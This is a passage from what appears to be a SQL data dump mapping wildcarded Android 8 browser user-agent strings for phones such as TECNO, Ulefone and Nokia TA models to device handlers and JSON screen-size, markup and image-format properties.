Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1020) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1021) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1024) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1025) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1027) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1028) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1032) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1033) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1038) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1039) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1044) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TA-1053) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TC56) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO B1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO B1f) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO B1p) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO B2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO BA2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO BB2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO CA7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO CA8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO CA8S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO CF7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO CF7S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO CF7k) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO CF8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO F2LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO F4 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO F4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO IN6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO KA6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO KA7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO KA7O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO KB2j) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO KB7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO LA7 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO LA7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO LB6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO LB7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO P703) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":683,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO R8O) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO RA6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO SA1S Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TECNO_F1) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_tecno','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TIS001) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TM-5074) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TM-5075) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TONE e19) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; TRENDY_LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Tesla_SP3_4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Tesla_SP6_4_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Tesla_SP9_2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Tommy3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Trekker-X4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Twist 2 Fit) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Twist 2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Twist 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Twist Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; U2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; U23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":749,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; U25_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; U503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; U683CL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; ULTRA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; URBAN 1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ulefone S7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ulefone_Armor_5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ulefone_Note 7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ulefone_S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ulefone_S11) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":400,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ulefone_S1_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ulefone_X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":756,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Ultra Vision) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V12) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V1732A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V18 pro_A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V1818A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V356B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V540_Level) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V550_Vision) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V551 Aura) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; V570_BIG_BEN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; 